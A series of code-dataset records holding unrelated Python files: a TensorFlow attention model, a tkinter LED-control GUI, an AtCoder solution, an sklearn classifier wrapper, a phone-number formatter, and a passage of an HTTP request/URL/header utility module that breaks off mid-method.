BahdanuAttention初始化函数\n :param hidden_units: attention里面的全连接的隐藏层节点数\n '''\n super(BahdanauAttention,self).__init__()\n self.dense_w1=tf.keras.layers.Dense(units=hidden_units)\n self.dense_w2=tf.keras.layers.Dense(units=hidden_units)\n self.dense_v=tf.keras.layers.Dense(units=1)\n\n\n def __call__(self,query,keys,values):\n '''\n 进行Bahdanau Attention操作\n :param query: 一个时刻t的query,我们一般使用解码器的某个时刻的hidden state,形状为[batch_size,query_dim]\n :param keys: 和query比较的keys, 一般使用编码器的全部输出,形状为[batch_size,max_time,keys_dim]\n :param values: 需要被attention的values,一般和key相同,你也可以使用自定的values,形状为[batch_size,max_time,values_dim]\n :return: 返回一个形状为[batch_size,max_time,1]的attention权重矩阵和形状为[batch_size,values_dim]的注意力向量\n '''\n query=tf.expand_dims(input=query,axis=1) #[batch_size,1,query_dim]\n logits_query=self.dense_w1(query) #[batch_size,1,hidden_units]\n\n logits_keys=self.dense_w2(keys) #[batch_size,max_time,hidden_units]\n\n logits=tf.nn.tanh(x=logits_query+logits_keys) #[batch_size,max_time,hidden_units]\n\n logits_v=self.dense_v(logits) #[batch_size,max_time,1]\n\n attention_weights=tf.nn.softmax(logits=logits_v,axis=1) #[batch_size,max_time,1]\n context_vector=tf.reduce_sum(input_tensor=attention_weights*values,axis=1) #[batch_size,values_dim]\n #print(\"context_vector:\", context_vector)\n return attention_weights,context_vector\n\n\n\nif __name__==\"__main__\":\n # query=tf.ones(shape=(20,100),dtype=tf.float32,name=\"query\")\n # print(\"query:\",query)\n #\n # keys=tf.ones(shape=(20,50,200),dtype=tf.float32,name=\"keys\")\n # print(\"keys:\",keys)\n #\n 
# attention_obj=BahdanauAttention(hidden_units=100)\n # attention_obj(query=query,keys=keys,values=keys)\n\n\n src_word_ids=np.array([[9,26,7,40],[7,24,6,100],[5,4,200,300],[5,4,200,300]])\n target_word_ids = np.array([[500, 26, 7, 40,10], [7, 24, 6, 100,0], [5, 4, 200, 300,80], [5, 4, 200, 300,90]])\n\n encoder=Encoder(vocab_size=5230,embeddings_dim=200,units=128,batch_size=30)\n en_outputs,en_states=encoder(word_ids=src_word_ids,mask=None,training=True)\n\n\n decoder=Decoder(vocab_size=62054,embeddings_dim=200,units=128,batch_size=30)\n word_ids_one_step=target_word_ids[:,0]\n print(\"word_ids_one_step:\\n\",word_ids_one_step)\n word_ids_one_step=np.expand_dims(a=word_ids_one_step,axis=-1)\n print(\"word_ids_one_step:\\n\",word_ids_one_step)\n\n\n decoder(word_ids=word_ids_one_step,pre_states=en_states,encoder_outputs=en_outputs)","sub_path":"Project/NeuralMachineTranslation/model/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":6421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"582697858","text":"#import tkinter as tk\nfrom tkinter import *\n\ndef formInterface(form):\n 'define form interface'\n frame = Frame(form, borderwidth=1, relief=GROOVE)\n \n label1 = Label(frame, text=\"LED 控制:\",font=(\"Helvetica\", 20))\n label1.pack(side=LEFT,padx=3,pady=3)\n \n buttonOn = Button(\n frame,\n text=\"ON\",\n font=(\"Helvetica\", 20),\n bg=\"GREEN\",\n padx=40,\n pady=20,\n command=buttonOn_Click\n )\n buttonOn.pack(side=LEFT, padx=3,pady=3)\n buttonOff = Button(\n frame,\n text=\"OFF\",\n font=(\"Helvetica\", 20),\n bg=\"RED\",\n padx=40,\n pady=20,\n command=buttonOff_Click\n )\n buttonOff.pack(side=LEFT, padx=3,pady=3)\n \n #textbox1 = Entry(frame, text=\"textbox(Entry)\")\n #textbox1.pack(padx=3,pady=3)\n \n #radioButton1 = Radiobutton(frame,text=\"radio button 1\")\n #radioButton1.pack(padx=3,pady=3)\n #radioButton2 = Radiobutton(frame,text=\"radio button 2\")\n #radioButton2.pack(padx=3,pady=3)\n \n frame.pack(padx=10,pady=10, fill=X)\n\ndef buttonOn_Click():\n print(\"ON 按下了\")\n\ndef buttonOff_Click():\n print(\"OFF 按下了\")\n\nif __name__ == '__main__':\n form = Tk()\n form.title('LED control')\n form.geometry(\"800x600\")\n form.option_add(\"*Button.Background\",\"#004A9B\")\n form.option_add(\"*Button.Foreground\",\"white\")\n formInterface(form)\n form.mainloop()\n\n\n","sub_path":"Python/LEDControl.py","file_name":"LEDControl.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"578150031","text":"from collections import deque\n\nH, W = map(int, input().split())\nA = [list(input()) for _ in range(H)]\n\nque = deque([(0, 0)])\nwhile que:\n h, w = que.popleft()\n\n A[h][w] = '?'\n\n if h == H - 1 and w == W - 1:\n break\n\n if h + 1 < H and A[h + 1][w] == '#':\n que.append((h + 1, w))\n continue\n\n if w + 1 < W and A[h][w + 1] == '#':\n que.append((h, w + 1))\n continue\n\ncnt = sum([a.count('#') for a in A])\nprint('Possible' if cnt == 0 else 'Impossible')\n","sub_path":"AtCoder/agc/007a_3.py","file_name":"007a_3.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"26139702","text":"from constants import *\n\nfrom sklearn.svm import SVC\nfrom xgboost import XGBClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.tree import 
DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\n\nfrom sklearn.model_selection import KFold, cross_val_score, GridSearchCV\nfrom sklearn.metrics import classification_report, f1_score, confusion_matrix\n\n\nclass Model:\n def __init__(self,\n test_x,\n test_y,\n cfg,\n train_x=None,\n train_y=None):\n self._fit_value = cfg['model']['fit_value']\n self._cfg = cfg['model']['fit_value']\n self._mode = cfg\n self._train_x = train_x\n self._train_y = train_y\n self._test_x = test_x\n self._test_y = test_y\n self._map_models = {'LogitReg': LogisticRegression,\n 'KNN': KNeighborsClassifier,\n 'LDA': LinearDiscriminantAnalysis,\n 'CART': DecisionTreeClassifier,\n 'SVM': SVC,\n 'XGB': XGBClassifier,\n 'RF': RandomForestClassifier}\n\n def choose_models(self):\n results = []\n names = []\n\n for name in self._map_models:\n model = self._map_models[name]\n k_fold = KFold(n_splits=self._fit_value['n_splits'],\n random_state=42,\n shuffle=True)\n cv_results = cross_val_score(estimator=model(),\n X=self._train_x,\n y=self._train_y,\n cv=k_fold,\n scoring='roc_auc')\n results.append(cv_results)\n names.append(name)\n logging.info('{}. Mean = {}, std = {}'.format(name,\n round(cv_results.mean(), 4),\n round(cv_results.std(), 3)))\n return results, names\n\n def train(self):\n\n params = self._fit_value['params']\n cls = self._map_models[self._fit_value['model']](**params)\n cls.fit(self._train_x, self._train_y)\n\n return cls\n\n def eval(self, cls, verbose=True):\n predicted = cls.predict(self._test_x)\n\n f1 = f1_score(self._test_y, predicted)\n conf_matrix = confusion_matrix(self._test_y, predicted)\n\n logging.info('F1 = {}'.format(f1))\n logging.info('CM = {}'.format(conf_matrix))\n if verbose:\n report = classification_report(self._test_y, predicted,\n output_dict=True)\n\n return report\n\n def grid_search(self, model, params):\n\n cls = self._map_models[model]\n grid = GridSearchCV(cls, params)\n grid.fit(self._train_x, self._train_y)\n return grid.best_estimator_, grid.best_params_\n","sub_path":"src/model/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"203302602","text":"def getInput():\n inputdata = input(\"Enter the mobile number: \")\n inputdata = inputdata.replace(\" \", \"\")\n\n while inputdata[0] != \"0\" or len(inputdata) != 11:\n inputdata = input(\"Enter the mobile number: \")\n inputdata = inputdata.replace(\" \", \"\")\n\n return inputdata\n\ndef formatNumber(phoneNumber):\n phoneNumber = phoneNumber[1:11]\n intNumber = \"+44 \" + phoneNumber[0:4] + \" \" + phoneNumber[4:10]\n print(intNumber)\n print(phoneNumber[0:4])\n print(phoneNumber[4:10])\n\n return intNumber\n\ndef Display(intNumber):\n print(\"Formatted number is: \" + intNumber)\n\nnum = formatNumber(getInput())\n\nDisplay(num)\n","sub_path":"6.3/6.3.py","file_name":"6.3.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"466689687","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals, division, print_function, absolute_import\nimport os\nimport urllib\nimport json\nimport types\nimport cgi\nimport re\nimport base64\nfrom BaseHTTPServer import BaseHTTPRequestHandler\nfrom functools import partial\nfrom wsgiref.headers import Headers as BaseHeaders\nfrom collections import Mapping, 
MutableSequence, Sequence\nimport itertools\nimport logging\nimport inspect\nimport copy\n\ntry:\n import urlparse\nexcept ImportError:\n from urllib import parse as urlparse\n\nfrom .decorators import _property\nfrom .utils import AcceptHeader, ByteString, MimeType\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass Headers(BaseHeaders, Mapping):\n \"\"\"handles headers, see wsgiref.Headers link for method and use information\n\n Handles normalizing of header names, the problem with headers is they can\n be in many different forms and cases and stuff (eg, CONTENT_TYPE and Content-Type),\n so this handles normalizing the header names so you can request Content-Type\n or CONTENT_TYPE and get the same value.\n\n This has the same interface as Python's built-in wsgiref.Headers class but\n makes it even more dict-like and will return titled header names when iterated\n or anything (eg, Content-Type instead of all lowercase content-type)\n\n Here is the headers spec:\n https://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html\n\n Here are the wsgiref class docs:\n https://docs.python.org/2/library/wsgiref.html#module-wsgiref.headers\n https://hg.python.org/cpython/file/2.7/Lib/wsgiref/headers.py\n \"\"\"\n @classmethod\n def normalize_name(cls, k):\n \"\"\"converts things like FOO_BAR to Foo-Bar which is the normal form\"\"\"\n klower = k.lower().replace('_', '-')\n bits = klower.split('-')\n return \"-\".join((bit.title() for bit in bits))\n\n def __init__(self, headers=None, **kwargs):\n super(Headers, self).__init__([])\n self.update(headers, **kwargs)\n\n def __setitem__(self, name, val):\n name = self.normalize_name(name)\n return super(Headers, self).__setitem__(name, val)\n\n def __delitem__(self, name):\n name = self.normalize_name(name)\n return super(Headers, self).__delitem__(name)\n\n def get_all(self, name):\n name = self.normalize_name(name)\n return super(Headers, self).get_all(name)\n\n def get(self, name, default=None):\n name = self.normalize_name(name)\n return super(Headers, self).get(name, default)\n\n def setdefault(self, name, val):\n name = self.normalize_name(name)\n return super(Headers, self).setdefault(name, val)\n\n def add_header(self, name, val, **params):\n name = self.normalize_name(name)\n return super(Headers, self).add_header(name, val, **params)\n\n def keys(self):\n return [self.normalize_name(k) for k, v in self._headers]\n\n def items(self):\n for k, v in self._headers:\n yield self.normalize_name(k), v\n\n def iteritems(self):\n return self.items()\n\n def iterkeys(self):\n for k in self.keys():\n yield k\n\n def __iter__(self):\n for k, v in self._headers:\n yield self.normalize_name(k)\n\n def pop(self, name, *args, **kwargs):\n val = self.get(name)\n if val is None:\n if args:\n val = args[0]\n elif \"default\" in kwargs:\n val = kwargs[\"default\"]\n else:\n raise KeyError(name)\n\n else:\n del self[name]\n\n return val\n\n def update(self, headers, **kwargs):\n if not headers: headers = {}\n if isinstance(headers, Mapping):\n headers.update(kwargs)\n headers = headers.items()\n\n else:\n if kwargs:\n headers = itertools.chain(\n headers,\n kwargs.items()\n )\n\n for k, v in headers:\n self[k] = v\n\n def copy(self):\n return self.__deepcopy__()\n\n def __deepcopy__(self):\n return type(self)(self._headers)\n\n\nclass RequestBody(object):\n \"\"\"this is the normalized request environment that every interface needs to\n conform to, it primarily acts like a wsgi environment, which is compatible with\n python's internal cgi.FieldStorage stuff\"\"\"\n\n 
# https://hg.python.org/cpython/file/2.7/Lib/cgi.py#l325\n\n def __init__(self, fp, headers, environ):\n self.headers = headers\n self.environ = environ\n self.fp = fp\n\n # make sure environ has the bare minimum to work\n for k in [\"REQUEST_METHOD\", \"QUERY_STRING\"]:\n if k not in self.environ:\n raise ValueError(\"environ dict does not contain {}\".format(k))\n\n def __iter__(self):\n body_fields = cgi.FieldStorage(\n fp=self.fp,\n headers=self.headers,\n environ=self.environ,\n keep_blank_values=True\n )\n\n for field_name in body_fields.keys():\n body_field = body_fields[field_name]\n if body_field.filename:\n yield field_name, body_field\n\n else:\n yield field_name, body_field.value\n\n\nclass ResponseBody(json.JSONEncoder):\n def default(self, obj):\n if isinstance(obj, types.GeneratorType):\n return [x for x in obj]\n\n elif isinstance(obj, Exception):\n return {\n \"errmsg\": str(obj)\n }\n\n else:\n return json.JSONEncoder.default(self, obj)\n\n\nclass Url(str):\n \"\"\"a url object on steroids, this is here to make it easy to manipulate urls\n we try to map the supported fields to their urlparse equivalents, with some additions\n\n https://tools.ietf.org/html/rfc3986.html\n\n given a url http://user:pass@foo.com:1000/bar/che?baz=boom#anchor\n with a controller: Bar\n\n .scheme = http\n .netloc = user:pass@foo.com:1000\n .hostloc = foo.com:1000\n .hostname = foo.com\n .host = http://foo.com\n .port = 1000\n .base = http://user:pass@foo.com:1000/bar/che\n .fragment = anchor\n .anchor = fragment\n .uri = /bar/che?baz=boom#anchor\n .host(...) = httop://foo.com/...\n .base(...) = httop://foo.com/bar/che/...\n .controller(...) = httop://foo.com/bar/...\n \"\"\"\n encoding = \"utf-8\"\n\n scheme = \"http\"\n\n username = None\n\n password = None\n\n hostname = \"\"\n\n port = None\n\n netloc = \"\"\n\n path = \"\"\n\n query_kwargs = {}\n\n fragment = \"\"\n\n controller_path = \"\"\n\n @property\n def root(self):\n \"\"\"just return scheme://netloc\"\"\"\n return urlparse.urlunsplit((\n self.scheme,\n self.netloc,\n \"\",\n \"\",\n \"\"\n ))\n\n @property\n def anchor(self):\n \"\"\"alternative name for fragment\"\"\"\n return self.fragment\n\n @property\n def uri(self):\n \"\"\"return the uri, which is everything but base (no scheme, host, etc)\"\"\"\n uristring = self.path\n if self.query:\n uristring += \"?{}\".format(self.query)\n if self.fragment:\n uristring += \"#{}\".format(self.fragment)\n\n return uristring\n\n def __new__(cls, urlstring=None, **kwargs):\n parts = cls.merge(urlstring, **kwargs)\n urlstring = parts.pop(\"urlstring\")\n instance = super(Url, cls).__new__(cls, urlstring)\n for k, v in parts.items():\n setattr(instance, k, v)\n return instance\n\n @classmethod\n def keys(cls):\n keys = set(k for k, v in inspect.getmembers(cls) if not k.startswith(\"__\") and not callable(v))\n for dk in [\"encoding\", \"root\", \"anchor\", \"uri\"]:\n keys.discard(dk)\n return keys\n\n @classmethod\n def merge(cls, urlstring=\"\", **kwargs):\n # we handle port before any other because the port of host:port in hostname takes precedence\n # the port on the host would take precedence because proxies mean that the\n # host can be something:10000 and the port could be 9000 because 10000 is\n # being proxied to 9000 on the machine, but we want to automatically account\n # for things like that and then if custom behavior is needed then this method\n # can be overridden\n parts = {\n \"hostname\": cls.hostname,\n \"port\": cls.port,\n \"query_kwargs\": dict(cls.query_kwargs),\n 
\"controller_path\": cls.controller_path,\n \"scheme\": cls.scheme,\n \"netloc\": cls.netloc,\n \"path\": cls.path,\n \"fragment\": cls.fragment,\n \"username\": cls.username,\n \"password\": cls.password,\n }\n\n if urlstring:\n properties = [\n \"scheme\",\n \"netloc\",\n \"path\",\n \"fragment\",\n \"username\",\n \"password\",\n \"hostname\",\n \"port\",\n \"query\",\n ]\n\n o = urlparse.urlsplit(str(urlstring))\n if o.scheme and o.netloc: # full url \n for k in properties:\n v = getattr(o, k)\n parts[k] = v\n\n elif o.scheme and o.path: # no scheme: host/some/path\n # we need to better normalize to account for port\n hostname, path = urlstring.split(\"/\", 1)\n parts[\"hostname\"] = hostname\n if \"?\" in path:\n path, query = path.split(\"?\", 1)\n parts[\"path\"] = path\n parts[\"query\"] = query\n\n else:\n parts[\"path\"] = path\n\n else:\n parts[\"hostname\"] = o.path\n\n query = parts.get(\"query\", \"\")\n if query:\n parts[\"query_kwargs\"].update(cls.parse_query(query))\n\n query = kwargs.pop(\"query\", \"\")\n if query:\n parts[\"query_kwargs\"].update(cls.parse_query(query))\n\n query_kwargs = kwargs.pop(\"query_kwargs\", {})\n if query_kwargs:\n parts[\"query_kwargs\"].update(query_kwargs)\n\n parts[\"query\"] = \"\"\n if parts[\"query_kwargs\"]:\n parts[\"query\"] = cls.unparse_query(parts[\"query_kwargs\"])\n\n for k, v in kwargs.items():\n parts[k] = v\n\n common_ports = set([80, 443])\n domain, port = cls.split_hostname_from_port(parts[\"hostname\"])\n parts[\"hostname\"] = domain\n if port:\n parts[\"port\"] = kwargs.get(\"port\", port)\n\n if not parts.get(\"port\", None):\n if parts[\"scheme\"] == \"http\":\n parts[\"port\"] = 80\n elif parts[\"scheme\"] == \"https\":\n parts[\"port\"] = 443\n\n if not parts.get(\"hostloc\", \"\"):\n hostloc = parts[\"hostname\"]\n port = parts[\"port\"]\n if port and port not in common_ports:\n hostloc = '{}:{}'.format(hostloc, port)\n parts[\"hostloc\"] = hostloc\n\n if not parts.get(\"netloc\", \"\"):\n parts[\"netloc\"] = parts[\"hostloc\"]\n\n username = kwargs.get(\"username\", None)\n password = kwargs.get(\"password\", None)\n merge_netloc = username or password\n\n if merge_netloc:\n if not username: username = parts[\"username\"]\n if not password: password = parts[\"password\"]\n if username:\n parts[\"netloc\"] = \"{}:{}@{}\".format(\n kwargs.get(\"username\", parts[\"username\"]),\n password if password else \"\",\n parts[\"hostloc\"]\n )\n\n # we don't want common ports to be a part of a .geturl() call, but we do\n # want .port to return them\n if not merge_netloc:\n for common_port in common_ports:\n port_str = \":{}\".format(common_port)\n if parts[\"netloc\"].endswith(port_str):\n parts[\"netloc\"] = parts[\"netloc\"][:-len(port_str)]\n\n parts[\"path\"] = \"/\".join(cls.normalize_paths(parts[\"path\"]))\n\n parts[\"urlstring\"] = urlparse.urlunsplit((\n parts[\"scheme\"],\n parts[\"netloc\"],\n parts[\"path\"],\n parts[\"query\"],\n parts[\"fragment\"],\n ))\n\n for k in parts:\n if isinstance(parts[k], bytes):\n parts[k] = parts[k].decode(cls.encoding)\n\n if parts[\"port\"]:\n parts[\"port\"] = int(parts[\"port\"])\n\n return parts\n\n @classmethod\n def parse_query(cls, query):\n \"\"\"return name=val&name2=val2 strings into {name: val} dict\"\"\"\n if not query: return {}\n\n d = {}\n # https://docs.python.org/2/library/urlparse.html\n for k, kv in urlparse.parse_qs(query, True, strict_parsing=True).items():\n #k = k.rstrip(\"[]\") # strip out php type array designated variables\n if len(kv) > 1:\n d[k] = kv\n 
else:\n d[k] = kv[0]\n\n return d\n\n @classmethod\n def unparse_query(cls, query_kwargs):\n return urllib.urlencode(query_kwargs, doseq=True)\n\n @classmethod\n def normalize_paths(cls, *paths):\n args = []\n for ps in paths:\n if isinstance(ps, basestring):\n args.extend(filter(None, ps.split(\"/\")))\n #args.append(ps.strip(\"/\"))\n else:\n for p in ps:\n args.extend(cls.normalize_paths(p))\n return args\n\n def _normalize_params(self, *paths, **query_kwargs):\n \"\"\"a lot of the helper methods are very similar, this handles their arguments\"\"\"\n kwargs = {}\n\n if paths:\n fragment = paths[-1]\n if fragment:\n if fragment.startswith(\"#\"):\n kwargs[\"fragment\"] = fragment\n paths.pop(-1)\n\n kwargs[\"path\"] = \"/\".join(self.normalize_paths(*paths))\n\n kwargs[\"query_kwargs\"] = query_kwargs\n return kwargs\n\n @classmethod\n def split_hostname_from_port(cls, hostname):\n \"\"\"given a hostname:port return a tuple (hostname, port)\"\"\"\n bits = hostname.split(\":\", 2)\n p = None\n d = bits[0]\n if len(bits) == 2:\n p = int(bits[1])\n\n return d, p\n\n def create(self, *args, **kwargs):\n return type(self)(*args, **kwargs)\n\n def add(self, **kwargs):\n \"\"\"Just a shortcut to change the current url, equivalent to Url(self, **kwargs)\"\"\"\n if \"path\" in kwargs:\n if not kwargs[\"path\"][0].startswith(\"/\"):\n paths = self.normalize_paths(self.path, kwargs[\"path\"])\n else:\n paths = self.normalize_paths(kwargs[\"path\"])\n kwargs[\"path\"] = \"/\".join(paths)\n return self.create(self, **kwargs)\n\n def subtract(self, *paths, **kwargs):\n sub_kwargs = self.jsonable()\n\n path2 = self.normalize_paths(paths)\n path2.extend(self.normalize_paths(kwargs.pop(\"path\", \"\")))\n if path2:\n sub_path = self.normalize_paths(self.path)\n for p in path2:\n try:\n sub_path.remove(p)\n except ValueError:\n pass\n\n sub_kwargs[\"path\"] = sub_path\n\n for k, v in kwargs.items():\n if k == \"query_kwargs\":\n for qk, qv in kwargs[k].items():\n if str(sub_kwargs[k][qk]) == str(qv):\n sub_kwargs[k].pop(qk)\n\n else:\n if str(sub_kwargs[k]) == str(v):\n sub_kwargs.pop(k)\n\n return self.create(**sub_kwargs)\n\n def controller(self, *paths, **query_kwargs):\n \"\"\"create a new url object using the controller path as a base\n\n if you have a controller `foo.BarController` then this would create a new\n Url instance with `host/foo/bar` as the base path, so any *paths will be\n appended to `/foo/bar`\n\n :example:\n # controller foo.BarController\n\n print url # http://host.com/foo/bar/some_random_path\n\n print url.controller() # http://host.com/foo/bar\n print url.controller(\"che\", boom=\"bam\") # http://host/foo/bar/che?boom=bam\n\n :param *paths: list, the paths to append to the controller path\n :param **query_kwargs: dict, any query string params to add\n \"\"\"\n kwargs = self._normalize_params(*paths, **query_kwargs)\n if self.controller_path:\n if \"path\" in kwargs:\n paths = self.normalize_paths(self.controller_path, kwargs[\"path\"])\n kwargs[\"path\"] = \"/\".join(paths)\n else:\n kwargs[\"path\"] = self.controller_path\n return self.create(self.root, **kwargs)\n\n def base(self, *paths, **query_kwargs):\n \"\"\"create a new url object using the current base path as a base\n\n if you had requested /foo/bar, then this would append *paths and **query_kwargs\n to /foo/bar\n\n :example:\n # current path: /foo/bar\n\n print url # http://host.com/foo/bar\n\n print url.base() # http://host.com/foo/bar\n print url.base(\"che\", boom=\"bam\") # http://host/foo/bar/che?boom=bam\n\n 
:param *paths: list, the paths to append to the current path without query params\n :param **query_kwargs: dict, any query string params to add\n \"\"\"\n kwargs = self._normalize_params(*paths, **query_kwargs)\n if self.path:\n if \"path\" in kwargs:\n paths = self.normalize_paths(self.path, kwargs[\"path\"])\n kwargs[\"path\"] = \"/\".join(paths)\n else:\n kwargs[\"path\"] = self.path\n return self.create(self.root, **kwargs)\n\n def host(self, *paths, **query_kwargs):\n \"\"\"create a new url object using the host as a base\n\n if you had requested http://host/foo/bar, then this would append *paths and **query_kwargs\n to http://host\n\n :example:\n # current url: http://host/foo/bar\n\n print url # http://host.com/foo/bar\n\n print url.host_url() # http://host.com/\n print url.host_url(\"che\", boom=\"bam\") # http://host/che?boom=bam\n\n :param *paths: list, the paths to append to the current path without query params\n :param **query_kwargs: dict, any query string params to add\n \"\"\"\n kwargs = self._normalize_params(*paths, **query_kwargs)\n return self.create(self.root, **kwargs)\n\n def copy(self):\n return self.__deepcopy__()\n\n def __copy__(self):\n return self.__deepcopy__()\n\n def __deepcopy__(self, memodict={}):\n return self.create(\n scheme=self.scheme,\n username=self.username,\n password=self.password,\n hostname=self.hostname,\n port=self.port,\n path=self.path,\n query_kwargs=self.query_kwargs,\n fragment=self.fragment,\n controller_path=self.controller_path,\n )\n\n def __add__(self, other):\n ret = \"\"\n if isinstance(other, Mapping):\n ret = self.add(query_kwargs=other)\n\n elif isinstance(other, MutableSequence):\n ret = self.add(path=other)\n\n elif isinstance(other, basestring):\n ret = self.add(path=other)\n\n elif isinstance(other, Sequence):\n ret = self.add(path=other)\n\n else:\n raise ValueError(\"Not sure how to add {}\".format(type(other)))\n\n return ret\n __iadd__ = __add__\n\n def __truediv__(self, other):\n ret = \"\"\n if isinstance(other, MutableSequence):\n ret = self.add(path=other)\n\n elif isinstance(other, basestring):\n ret = self.add(path=other)\n\n elif isinstance(other, Sequence):\n ret = self.add(path=other)\n\n else:\n raise ValueError(\"Not sure how to add {}\".format(type(other)))\n\n return ret\n __itruediv__ = __truediv__\n\n def __sub__(self, other):\n \"\"\"Return a new url with other removed\"\"\"\n ret = \"\"\n if isinstance(other, Mapping):\n ret = self.subtract(query_kwargs=other)\n\n elif isinstance(other, MutableSequence):\n ret = self.subtract(path=other)\n\n elif isinstance(other, basestring):\n ret = self.subtract(path=other)\n\n elif isinstance(other, Sequence):\n ret = self.subtract(path=other)\n\n else:\n raise ValueError(\"Not sure how to add {}\".format(type(other)))\n\n return ret\n __isub__ = __sub__\n\n def jsonable(self):\n ret = {}\n for k in self.keys():\n v = getattr(self, k)\n if k == \"query_kwargs\":\n ret[k] = dict(v)\n else:\n ret[k] = v\n\n return ret\n\n\nclass Http(object):\n def __init__(self):\n self.headers = Headers()\n\n def has_header(self, header_name):\n \"\"\"return true if the header is set\"\"\"\n return header_name in self.headers\n\n def set_headers(self, headers):\n \"\"\"replace all headers with passed in headers\"\"\"\n self.headers = Headers(headers)\n\n def add_headers(self, headers, **kwargs):\n self.headers.update(headers, **kwargs)\n\n def set_header(self, header_name, val):\n self.headers[header_name] = val\n\n def add_header(self, header_name, val, **params):\n 
self.headers.add_header(header_name, val, **params)\n\n    def get_header(self, header_name, default_val=None):\n        \"\"\"try as hard as possible to get a response header of header_name,\n        return default_val if it can't be found\"\"\"\n        return self.headers.get(header_name, default_val)\n\n    def _parse_query_str(self, query):\n        \"\"\"return name=val&name2=val2 strings into {name: val} dict\"\"\"\n        u = Url(query=query)\n        return u.query_kwargs\n\n    def _build_body_str(self, b):\n        # we are returning the body, let's try and be smart about it and match content type\n        ct = self.get_header('content-type')\n        if ct:\n            ct = ct.lower()\n            if ct.rfind(\"json\") >= 0:\n                if b:\n                    b = json.dumps(b)\n                else:\n                    b = None\n\n            elif ct.rfind(\"x-www-form-urlencoded\") >= 0:\n                b = urllib.urlencode(b, doseq=True)\n\n        return b\n\n    def copy(self):\n        \"\"\"nice handy wrapper around the deepcopy\"\"\"\n        return copy.deepcopy(self)\n\n    def __deepcopy__(self, memodict={}):\n        instance = type(self)()\n        for key, val in self.__dict__.items():\n            #pout.v(key, val)\n            if not key.startswith(\"_\"):\n                if val is None:\n                    setattr(instance, key, val)\n\n                else:\n                    if key == \"environ\":\n                        d = type(val)()\n                        for k, v in val.items():\n                            if k.lower() == \"wsgi.input\":\n                                d[k] = v\n                            else:\n                                d[k] = copy.deepcopy(v, memodict)\n\n                        setattr(instance, key, d)\n\n                    elif key == \"body_input\":\n                        setattr(instance, key, val)\n\n                    else:\n                        #setattr(instance, key, copy.deepcopy(val, memodict))\n                        try:\n                            setattr(instance, key, copy.deepcopy(val, memodict))\n                        except (AttributeError, TypeError):\n                        #except AttributeError:\n                            setattr(instance, key, copy.copy(val))\n\n        return instance\n\n\nclass Request(Http):\n    '''\n    common interface that endpoints uses to decide what to do with the incoming request\n\n    an instance of this class is used by the endpoints Call instance to decide where endpoints\n    should route requests, so, many times, you'll need to write a glue function that takes however\n    your request data is passed to Python and converts it into a Request instance that endpoints can\n    understand\n\n    properties --\n\n    headers -- a dict of all the request headers in { header_name: header_val } format\n    path -- the /path/part/of/the/url\n    path_args -- tied to path, it's the path, but divided by / so all the path bits are returned as a list\n    query -- the ?name=val portion of a url\n    query_kwargs -- tied to query, the values in query but converted to a dict {name: val}\n    '''\n\n    environ = None\n    \"\"\"holds all the values that aren't considered headers but usually get passed with the request\"\"\"\n\n    raw_request = None\n    \"\"\"the original raw request that was filtered through one of the interfaces\"\"\"\n\n    method = None\n    \"\"\"the http method (GET, POST)\"\"\"\n\n    body_input = None\n    \"\"\"the request body input, if this is a POST request\"\"\"\n\n    controller_info = None\n    \"\"\"will hold the controller information for the request, populated from the Call\"\"\"\n\n    @property\n    def accept_encoding(self):\n        \"\"\"The encoding the client requested the response to use\"\"\"\n        # https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Accept-Charset\n        ret = \"\"\n        accept_encoding = self.get_header(\"Accept-Charset\", \"\")\n        if accept_encoding:\n            bits = re.split(r\"\\s+\", accept_encoding)\n            bits = bits[0].split(\";\")\n            ret = bits[0]\n        return ret\n\n    @_property\n    def encoding(self):\n        \"\"\"the character encoding of the request, usually only set in POST type requests\"\"\"\n        encoding = None\n        ct = self.get_header('content-type')\n        if ct:\n            ah = AcceptHeader(ct)\n            if 
ah.media_types:\n encoding = ah.media_types[0][2].get(\"charset\", None)\n\n return encoding\n\n @property\n def access_token(self):\n \"\"\"return an Oauth 2.0 Bearer access token if it can be found\"\"\"\n access_token = self.get_auth_bearer()\n if not access_token:\n access_token = self.query_kwargs.get('access_token', '')\n if not access_token:\n access_token = self.body_kwargs.get('access_token', '')\n\n return access_token\n\n @property\n def client_tokens(self):\n \"\"\"try and get Oauth 2.0 client id and secret first from basic auth header,\n then from GET or POST parameters\n\n return -- tuple -- client_id, client_secret\n \"\"\"\n client_id, client_secret = self.get_auth_basic()\n if not client_id and not client_secret:\n client_id = self.query_kwargs.get('client_id', '')\n client_secret = self.query_kwargs.get('client_secret', '')\n if not client_id and not client_secret:\n client_id = self.body_kwargs.get('client_id', '')\n client_secret = self.body_kwargs.get('client_secret', '')\n\n return client_id, client_secret\n\n @_property(read_only=True)\n def ips(self):\n \"\"\"return all the possible ips of this request, this will include public and private ips\"\"\"\n r = []\n names = ['X_FORWARDED_FOR', 'CLIENT_IP', 'X_REAL_IP', 'X_FORWARDED', \n 'X_CLUSTER_CLIENT_IP', 'FORWARDED_FOR', 'FORWARDED', 'VIA',\n 'REMOTE_ADDR']\n\n for name in names:\n vs = self.get_header(name, '')\n if vs:\n r.extend(map(lambda v: v.strip(), vs.split(',')))\n\n vs = self.environ.get(name, '')\n if vs:\n r.extend(map(lambda v: v.strip(), vs.split(',')))\n\n return r\n\n @_property(read_only=True)\n def ip(self):\n \"\"\"return the public ip address\"\"\"\n r = ''\n\n # this was compiled from here:\n 